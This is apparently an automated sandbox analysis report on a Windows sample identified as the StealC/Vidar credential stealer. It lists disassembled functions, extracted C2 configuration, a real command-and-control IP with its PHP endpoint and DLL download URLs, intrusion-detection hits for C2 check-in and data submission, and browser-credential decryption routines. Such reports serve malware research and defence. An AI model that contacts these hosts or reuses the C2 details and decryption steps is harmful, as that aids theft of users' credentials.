Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: d18c8f4ab8c813dd3c090c18c99ac1be27b2d93c34b99b7a09a350edb93ba6a7
Instruction ID: 4d3fe318adb67189b150a49719d75814eec0b998bce21d823e075816cdc2486d
Opcode Fuzzy Hash: d18c8f4ab8c813dd3c090c18c99ac1be27b2d93c34b99b7a09a350edb93ba6a7
Instruction Fuzzy Hash: 3E4129B2D10109ABCF04EFA4D945FFEB774BB58708F11841DE416B6290EB75AA05CFA2

Function 6CB16470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CB182BC,?,?), ref: 6CB1649B

Part of subcall function 6CAECA10: malloc.MOZGLUE(?), ref: 6CAECA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB164A9

Part of subcall function 6CB0FA80: GetCurrentThreadId.KERNEL32 ref: 6CB0FA8D
Part of subcall function 6CB0FA80: AcquireSRWLockExclusive.KERNEL32(6CB5F448), ref: 6CB0FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1653F
free.MOZGLUE(?), ref: 6CB1655A

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: f028a5dc8d6601f8e82bb6d24b7c3f47bfeda514127695e6e3bdf9fb941a75d6
Instruction ID: 6e494324d18a2d0ff9a15684dc924b9a2fea3848331a8a177d0472a2c996b698
Opcode Fuzzy Hash: f028a5dc8d6601f8e82bb6d24b7c3f47bfeda514127695e6e3bdf9fb941a75d6
Instruction Fuzzy Hash: 263190B5A083459FD704CF14D880AAEBBF4FF88314F40842EE89A87740DB34E909CB92

Function 6CAEB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CAEB4F5
AcquireSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CAEB502
ReleaseSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CAEB542
free.MOZGLUE(?), ref: 6CAEB578

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 675a7e9a55b0eafaf7a326d167c57bed58f7deb4eb0f2bc0046dd25db5b055b2
Instruction ID: 3ef97174df7ce5fd851f1c51ddbb3536b3be93eda9d8355796f600954c32ad6f
Opcode Fuzzy Hash: 675a7e9a55b0eafaf7a326d167c57bed58f7deb4eb0f2bc0046dd25db5b055b2
Instruction Fuzzy Hash: 13110330A04B41C7E7128F29D5047A2B3B0FF9A318F98970AE84A53A01EBB0B1C5C7E4

Function 6CB13DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CADF20E,?), ref: 6CB13DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CADF20E,00000000,?), ref: 6CB13DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB13E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CB13E0E

Part of subcall function 6CB0CC00: GetCurrentProcess.KERNEL32(?,?,6CAD31A7), ref: 6CB0CC0D
Part of subcall function 6CB0CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CAD31A7), ref: 6CB0CC16

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: abb2a3061fb0d94433302eede38147e1a72cc0416cd8edfce3593febd002ed36
Instruction ID: be779c5c6fdbad543df7a3d980d8460076858acf141dcdce0da715b183c46b22
Opcode Fuzzy Hash: abb2a3061fb0d94433302eede38147e1a72cc0416cd8edfce3593febd002ed36
Instruction Fuzzy Hash: 3DF012B16002487BDB01AF54DC41DAF376DDB46624F444020FD0857741D775BE1996F7

Function 00AC92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00AC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00AC3AEE,?), ref: 00AC92FC
GetFileSizeEx.KERNEL32(000000FF,00AC3AEE), ref: 00AC9319
CloseHandle.KERNEL32(000000FF), ref: 00AC9327

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: e9d6fcc1cf64642be76deeb349b1371a4b8824fca06db293de434d6bff6218e4
Instruction ID: 510741cb8b03d86f52eefae1a301c97ee2f3a920aee8c19e98df16d29d0ddb3a
Opcode Fuzzy Hash: e9d6fcc1cf64642be76deeb349b1371a4b8824fca06db293de434d6bff6218e4
Instruction Fuzzy Hash: 42F03C75E40208BBDB10DBB5DC49FAEB7F9AB48710F118658B655AB2C0DB70A601CF41

Function 00ACC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00ACC74E

Part of subcall function 00ACBF9F: __amsg_exit.LIBCMT ref: 00ACBFAF

__getptd.LIBCMT ref: 00ACC765
__amsg_exit.LIBCMT ref: 00ACC773
__updatetlocinfoEx_nolock.LIBCMT ref: 00ACC797

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 81e9154a660288833f4967750797a8a5ee55de687a9346efc370eceb63abb111
Instruction ID: 85ec6b2baef2013d6be8fbf606e97ecc033316504e7d0dd5a2b7fe62b9dd229f
Opcode Fuzzy Hash: 81e9154a660288833f4967750797a8a5ee55de687a9346efc370eceb63abb111
Instruction Fuzzy Hash: DBF09032D15214DBDB21BBB85A07F5D33E0AF00B34F23414DF41AB62D2CB6559419EA6

Function 6CB285B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CB285D3

Part of subcall function 6CAECA10: malloc.MOZGLUE(?), ref: 6CAECA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CB28725

Strings

map/set<T> too long, xrefs: 6CB28720

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 986cc30ed85de555caf1c1744610bccd48407bba8436d6ac9b7d45bbf3c0cb19
Instruction ID: 55380471830fa0dc8dc39c9607a6ee9d6acc71ab22c06cd447361784d82e22a6
Opcode Fuzzy Hash: 986cc30ed85de555caf1c1744610bccd48407bba8436d6ac9b7d45bbf3c0cb19
Instruction Fuzzy Hash: 095168756006818FD702CF18C184A69BBF1FF59318F18C18AD85D5BB62C33AE885CF92

Function 6CB13CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB13D19
mozalloc_abort.MOZGLUE(?), ref: 6CB13D6C

Strings

d, xrefs: 6CB13D58

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 2d56504509bb1ae9890480cfebdfcecb2f34adbe5e4e7328e1417b23a22e3b6f
Instruction ID: ffd51f3863e45526cb16759b0aa9d5e4223a2f528e9f939c4857a86e095c710c
Opcode Fuzzy Hash: 2d56504509bb1ae9890480cfebdfcecb2f34adbe5e4e7328e1417b23a22e3b6f
Instruction Fuzzy Hash: 99110171E186D89BDB019F69C8154EEB775EF86218B848228EC449BA02FB30A5C4C790

Function 6CB36DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CB36E22
__Init_thread_footer.LIBCMT ref: 6CB36E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CB36E1D

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 9997b129d36a00bf3a0c2b0dd8e7fa9cca27bf0be8a41dd98c018665dfb327f2
Instruction ID: 316c24abf1f1afb2cbbfc6504ffddd8475ff54637787912645425894ebd3c52c
Opcode Fuzzy Hash: 9997b129d36a00bf3a0c2b0dd8e7fa9cca27bf0be8a41dd98c018665dfb327f2
Instruction Fuzzy Hash: 71F09739B042D0CBDB008FA8C850A9EF772F703228F8811A5C80887BE1C730B51ACE93

Function 6CB2B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CB2B2C9,?,?,?,6CB2B127,?,?,?,?,?,?,?,?,?,6CB2AE52), ref: 6CB2B628

Part of subcall function 6CB290E0: free.MOZGLUE(?,00000000,?,?,6CB2DEDB), ref: 6CB290FF
Part of subcall function 6CB290E0: free.MOZGLUE(?,00000000,?,?,6CB2DEDB), ref: 6CB29108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB2B2C9,?,?,?,6CB2B127,?,?,?,?,?,?,?,?,?,6CB2AE52), ref: 6CB2B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB2B2C9,?,?,?,6CB2B127,?,?,?,?,?,?,?,?,?,6CB2AE52), ref: 6CB2B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CB2B127,?,?,?,?,?,?,?,?), ref: 6CB2B74D

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 9a502952e8652031452496e464b3f839248af5ca262aae13a68fe543402694a0
Instruction ID: a6122d0398a0a5d00dd4fdda7db45b0413079bdb90a5af82390de2c99bbb886e
Opcode Fuzzy Hash: 9a502952e8652031452496e464b3f839248af5ca262aae13a68fe543402694a0
Instruction Fuzzy Hash: A951B071A052568FDB14CF18C980B6EB7B5FF49304F59852DC89FAB710DB39A804CBA1

Function 6CB3B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CAE0A4D), ref: 6CB3B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CAE0A4D), ref: 6CB3B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CAE0A4D), ref: 6CB3B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CAE0A4D), ref: 6CB3B67F

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 3772ad7b1ade34a44cd3f108135a4faea5ed73a22fed253691b59d8014d97053
Instruction ID: c039eb777d225e45925f9a373176a89b441be459cd7d3a3eb057256664b3d959
Opcode Fuzzy Hash: 3772ad7b1ade34a44cd3f108135a4faea5ed73a22fed253691b59d8014d97053
Instruction Fuzzy Hash: B831D471B016268FDB10CF58CC4465AFBBAFF85314F5A8569C80E9B20ADB31E915CBA1

Function 6CB0F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CB0F611
memcpy.VCRUNTIME140(?,?,?), ref: 6CB0F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CB0F652
memcpy.VCRUNTIME140(?,?,?), ref: 6CB0F668

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: da519cb65f4f54f14df2a6ed57246dfec65ff54ba12b7719bb156dee23131e03
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: B9313E71B00654AFC714CF59CCC0A9F7BB6EB84758B148539EA4A8BB09D631ED448B98

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware

Source: 0.2.file.exe.ab0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.ab0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00AB9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00ABC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00AB9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00AB7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00AC8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CAE6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.6:49711
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.6:49711
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49711 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
